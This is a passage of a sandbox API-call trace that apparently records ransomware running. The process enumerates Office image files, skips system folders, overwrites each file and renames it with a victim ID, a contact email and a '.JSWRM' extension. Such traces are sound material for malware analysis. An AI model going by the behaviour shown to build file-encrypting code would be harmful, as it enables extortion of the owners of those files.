(lpString1="WinWordLogo.contrast-black_scale-80.png", lpString2="recovery") returned 1 [0134.293] lstrcmpiW (lpString1="WinWordLogo.contrast-black_scale-80.png", lpString2="perflogs") returned 1 [0134.294] lstrcmpiW (lpString1="WinWordLogo.contrast-black_scale-80.png", lpString2="documents and settings") returned 1 [0134.294] lstrcmpiW (lpString1="WinWordLogo.contrast-black_scale-80.png", lpString2="$RECYCLE.BIN") returned 1 [0134.294] lstrcmpiW (lpString1="WinWordLogo.contrast-black_scale-80.png", lpString2="system volume information") returned 1 [0134.294] lstrcmpiW (lpString1="WinWordLogo.contrast-black_scale-80.png", lpString2="msocache") returned 1 [0134.294] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22bf60 [0134.294] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="WinWordLogo.contrast-black_scale-80.png", cchWideChar=39, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 39 [0134.294] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0134.294] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="WinWordLogo.contrast-black_scale-80.png", cchWideChar=39, lpMultiByteStr=0x22d260, cbMultiByte=39, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="WinWordLogo.contrast-black_scale-80.png", lpUsedDefaultChar=0x0) returned 39 [0134.294] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22bf60 | out: hHeap=0x1e0000) returned 1 [0134.294] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22beb0 [0134.294] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="WinWordLogo.contrast-black_scale-80.png", cchWideChar=39, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 39 [0134.294] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d298 [0134.294] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="WinWordLogo.contrast-black_scale-80.png", cchWideChar=39, lpMultiByteStr=0x22d298, cbMultiByte=39, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="WinWordLogo.contrast-black_scale-80.png", lpUsedDefaultChar=0x0) returned 39 [0134.294] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22beb0 | out: hHeap=0x1e0000) returned 1 [0134.294] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xd0) returned 0x22ea18 [0134.294] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22f6c0 | out: hHeap=0x1e0000) returned 1 [0134.294] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0134.294] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0134.294] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xd0) returned 0x22df20 [0134.294] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\LogoImages\\WinWordLogo.contrast-black_scale-80.png" (normalized: "c:\\program files\\microsoft office\\root\\office16\\logoimages\\winwordlogo.contrast-black_scale-80.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0134.295] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=2054) returned 1 [0134.295] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0134.295] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x800) returned 0x20c6c0 [0134.295] ReadFile (in: hFile=0x238, lpBuffer=0x20c6c0, nNumberOfBytesToRead=0x800, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x20c6c0*, lpNumberOfBytesRead=0x345e89c*=0x800, lpOverlapped=0x0) returned 1 [0134.297] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0134.297] WriteFile (in: hFile=0x238, lpBuffer=0x20c6c0*, nNumberOfBytesToWrite=0x800, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x20c6c0*, lpNumberOfBytesWritten=0x345e898*=0x800, lpOverlapped=0x0) returned 1 [0134.297] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20c6c0 | out: hHeap=0x1e0000) returned 1 [0134.297] CloseHandle (hObject=0x238) returned 1 [0134.297] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xd0) returned 0x22f6c0 [0134.297] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0134.297] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0d8 [0134.297] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0d8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0134.297] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0134.297] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0d8 | out: hHeap=0x1e0000) returned 1 [0134.297] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0134.297] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a330 [0134.297] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a330, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0134.297] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a330 | out: hHeap=0x1e0000) returned 1 [0134.297] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xd0) returned 0x22eca0 [0134.297] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x136) returned 0x24f208 [0134.297] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22eca0 | out: hHeap=0x1e0000) returned 1 [0134.297] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0134.297] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\LogoImages\\WinWordLogo.contrast-black_scale-80.png" (normalized: "c:\\program files\\microsoft office\\root\\office16\\logoimages\\winwordlogo.contrast-black_scale-80.png"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\LogoImages\\WinWordLogo.contrast-black_scale-80.png.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\logoimages\\winwordlogo.contrast-black_scale-80.png.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0134.298] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24f208 | out: hHeap=0x1e0000) returned 1 [0134.299] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22f6c0 | out: hHeap=0x1e0000) returned 1 [0134.299] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22df20 | out: hHeap=0x1e0000) returned 1 [0134.299] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d298 | out: hHeap=0x1e0000) returned 1 [0134.299] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0134.299] FindNextFileW (in: hFindFile=0x232100, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x1a7e29bd, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x1a7e29bd, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x1a8a15c5, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x8dc, dwReserved0=0xf1348, dwReserved1=0x0, cFileName="WinWordLogo.contrast-white_scale-100.png", cAlternateFileName="WINWOR~4.PNG")) returned 1 [0134.299] lstrcmpiW (lpString1="WinWordLogo.contrast-white_scale-100.png", lpString2=".") returned 1 [0134.299] lstrcmpiW (lpString1="WinWordLogo.contrast-white_scale-100.png", lpString2="..") returned 1 [0134.299] lstrcmpiW (lpString1="WinWordLogo.contrast-white_scale-100.png", lpString2="...") returned 1 [0134.299] lstrcmpiW (lpString1="WinWordLogo.contrast-white_scale-100.png", lpString2="windows") returned 1 [0134.299] lstrcmpiW (lpString1="WinWordLogo.contrast-white_scale-100.png", lpString2="recovery") returned 1 [0134.299] lstrcmpiW (lpString1="WinWordLogo.contrast-white_scale-100.png", lpString2="perflogs") returned 1 [0134.299] lstrcmpiW (lpString1="WinWordLogo.contrast-white_scale-100.png", lpString2="documents and settings") returned 1 [0134.299] lstrcmpiW (lpString1="WinWordLogo.contrast-white_scale-100.png", lpString2="$RECYCLE.BIN") returned 1 [0134.299] lstrcmpiW (lpString1="WinWordLogo.contrast-white_scale-100.png", lpString2="system volume information") returned 1 [0134.299] lstrcmpiW (lpString1="WinWordLogo.contrast-white_scale-100.png", lpString2="msocache") returned 1 [0134.299] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x232bb0 [0134.299] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="WinWordLogo.contrast-white_scale-100.png", cchWideChar=40, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 40 [0134.299] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0134.299] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="WinWordLogo.contrast-white_scale-100.png", cchWideChar=40, lpMultiByteStr=0x22cdc8, cbMultiByte=40, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="WinWordLogo.contrast-white_scale-100.png", lpUsedDefaultChar=0x0) returned 40 [0134.299] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x232bb0 | out: hHeap=0x1e0000) returned 1 [0134.299] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x2331c8 [0134.299] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="WinWordLogo.contrast-white_scale-100.png", cchWideChar=40, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 40 [0134.299] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0134.299] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="WinWordLogo.contrast-white_scale-100.png", cchWideChar=40, lpMultiByteStr=0x22ce70, cbMultiByte=40, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="WinWordLogo.contrast-white_scale-100.png", lpUsedDefaultChar=0x0) returned 40 [0134.299] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2331c8 | out: hHeap=0x1e0000) returned 1 [0134.299] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xd0) returned 0x22f6c0 [0134.299] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ea18 | out: hHeap=0x1e0000) returned 1 [0134.299] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0134.299] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0134.299] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xd0) returned 0x22dd70 [0134.299] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\LogoImages\\WinWordLogo.contrast-white_scale-100.png" (normalized: "c:\\program files\\microsoft office\\root\\office16\\logoimages\\winwordlogo.contrast-white_scale-100.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0134.300] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=2268) returned 1 [0134.300] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0134.301] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x8d0) returned 0x20c6c0 [0134.301] ReadFile (in: hFile=0x238, lpBuffer=0x20c6c0, nNumberOfBytesToRead=0x8d0, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x20c6c0*, lpNumberOfBytesRead=0x345e89c*=0x8d0, lpOverlapped=0x0) returned 1 [0134.302] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0134.302] WriteFile (in: hFile=0x238, lpBuffer=0x20c6c0*, nNumberOfBytesToWrite=0x8d0, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x20c6c0*, lpNumberOfBytesWritten=0x345e898*=0x8d0, lpOverlapped=0x0) returned 1 [0134.302] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20c6c0 | out: hHeap=0x1e0000) returned 1 [0134.302] CloseHandle (hObject=0x238) returned 1 [0134.302] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xd0) returned 0x22df20 [0134.302] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0134.302] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0134.302] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d260, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0134.302] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0d8 [0134.302] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0134.302] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0134.303] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a420 [0134.303] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a420, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0134.303] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a420 | out: hHeap=0x1e0000) returned 1 [0134.303] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xe0) returned 0x22bbc0 [0134.303] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x14e) returned 0x21c578 [0134.303] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22bbc0 | out: hHeap=0x1e0000) returned 1 [0134.303] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0d8 | out: hHeap=0x1e0000) returned 1 [0134.303] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\LogoImages\\WinWordLogo.contrast-white_scale-100.png" (normalized: "c:\\program files\\microsoft office\\root\\office16\\logoimages\\winwordlogo.contrast-white_scale-100.png"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\LogoImages\\WinWordLogo.contrast-white_scale-100.png.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\logoimages\\winwordlogo.contrast-white_scale-100.png.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0134.304] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x21c578 | out: hHeap=0x1e0000) returned 1 [0134.304] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22df20 | out: hHeap=0x1e0000) returned 1 [0134.304] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22dd70 | out: hHeap=0x1e0000) returned 1 [0134.304] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0134.304] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0134.304] FindNextFileW (in: hFindFile=0x232100, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x1a8a15c5, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x1a8a15c5, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x1b0f9971, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0xa0f, dwReserved0=0xf1348, dwReserved1=0x0, cFileName="WinWordLogo.contrast-white_scale-140.png", cAlternateFileName="WID44A~1.PNG")) returned 1 [0134.304] lstrcmpiW (lpString1="WinWordLogo.contrast-white_scale-140.png", lpString2=".") returned 1 [0134.304] lstrcmpiW (lpString1="WinWordLogo.contrast-white_scale-140.png", lpString2="..") returned 1 [0134.304] lstrcmpiW (lpString1="WinWordLogo.contrast-white_scale-140.png", lpString2="...") returned 1 [0134.304] lstrcmpiW (lpString1="WinWordLogo.contrast-white_scale-140.png", lpString2="windows") returned 1 [0134.304] lstrcmpiW (lpString1="WinWordLogo.contrast-white_scale-140.png", lpString2="recovery") returned 1 [0134.304] lstrcmpiW (lpString1="WinWordLogo.contrast-white_scale-140.png", lpString2="perflogs") returned 1 [0134.304] lstrcmpiW (lpString1="WinWordLogo.contrast-white_scale-140.png", lpString2="documents and settings") returned 1 [0134.304] lstrcmpiW (lpString1="WinWordLogo.contrast-white_scale-140.png", lpString2="$RECYCLE.BIN") returned 1 [0134.304] lstrcmpiW (lpString1="WinWordLogo.contrast-white_scale-140.png", lpString2="system volume information") returned 1 [0134.304] lstrcmpiW (lpString1="WinWordLogo.contrast-white_scale-140.png", lpString2="msocache") returned 1 [0134.304] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x233028 [0134.304] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="WinWordLogo.contrast-white_scale-140.png", cchWideChar=40, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 40 [0134.304] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0d8 [0134.304] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="WinWordLogo.contrast-white_scale-140.png", cchWideChar=40, lpMultiByteStr=0x22d0d8, cbMultiByte=40, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="WinWordLogo.contrast-white_scale-140.png", lpUsedDefaultChar=0x0) returned 40 [0134.304] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x233028 | out: hHeap=0x1e0000) returned 1 [0134.305] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x232c80 [0134.305] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="WinWordLogo.contrast-white_scale-140.png", cchWideChar=40, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 40 [0134.305] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0134.305] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="WinWordLogo.contrast-white_scale-140.png", cchWideChar=40, lpMultiByteStr=0x22d260, cbMultiByte=40, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="WinWordLogo.contrast-white_scale-140.png", lpUsedDefaultChar=0x0) returned 40 [0134.305] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x232c80 | out: hHeap=0x1e0000) returned 1 [0134.305] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xd0) returned 0x22dd70 [0134.305] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22f6c0 | out: hHeap=0x1e0000) returned 1 [0134.305] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0134.305] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0134.305] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xd0) returned 0x22e358 [0134.305] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\LogoImages\\WinWordLogo.contrast-white_scale-140.png" (normalized: "c:\\program files\\microsoft office\\root\\office16\\logoimages\\winwordlogo.contrast-white_scale-140.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0134.306] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=2575) returned 1 [0134.306] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0134.306] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa00) returned 0x20c6c0 [0134.306] ReadFile (in: hFile=0x238, lpBuffer=0x20c6c0, nNumberOfBytesToRead=0xa00, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x20c6c0*, lpNumberOfBytesRead=0x345e89c*=0xa00, lpOverlapped=0x0) returned 1 [0134.308] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0134.308] WriteFile (in: hFile=0x238, lpBuffer=0x20c6c0*, nNumberOfBytesToWrite=0xa00, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x20c6c0*, lpNumberOfBytesWritten=0x345e898*=0xa00, lpOverlapped=0x0) returned 1 [0134.308] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20c6c0 | out: hHeap=0x1e0000) returned 1 [0134.308] CloseHandle (hObject=0x238) returned 1 [0134.308] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xd0) returned 0x22df20 [0134.308] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0134.308] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d298 [0134.308] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d298, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0134.308] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0134.308] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d298 | out: hHeap=0x1e0000) returned 1 [0134.308] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0134.308] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a2a0 [0134.308] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a2a0, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0134.308] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a2a0 | out: hHeap=0x1e0000) returned 1 [0134.308] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xe0) returned 0x22ae28 [0134.308] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x14e) returned 0x21c578 [0134.308] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ae28 | out: hHeap=0x1e0000) returned 1 [0134.308] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0134.309] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\LogoImages\\WinWordLogo.contrast-white_scale-140.png" (normalized: "c:\\program files\\microsoft office\\root\\office16\\logoimages\\winwordlogo.contrast-white_scale-140.png"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\LogoImages\\WinWordLogo.contrast-white_scale-140.png.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\logoimages\\winwordlogo.contrast-white_scale-140.png.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0134.310] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x21c578 | out: hHeap=0x1e0000) returned 1 [0134.310] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22df20 | out: hHeap=0x1e0000) returned 1 [0134.310] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22e358 | out: hHeap=0x1e0000) returned 1 [0134.310] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0134.310] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0d8 | out: hHeap=0x1e0000) returned 1 [0134.310] FindNextFileW (in: hFindFile=0x232100, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x1a7e29bd, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x1a7e29bd, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x1a7e29bd, ftLastWriteTime.dwHighDateTime=0x1d327e8, 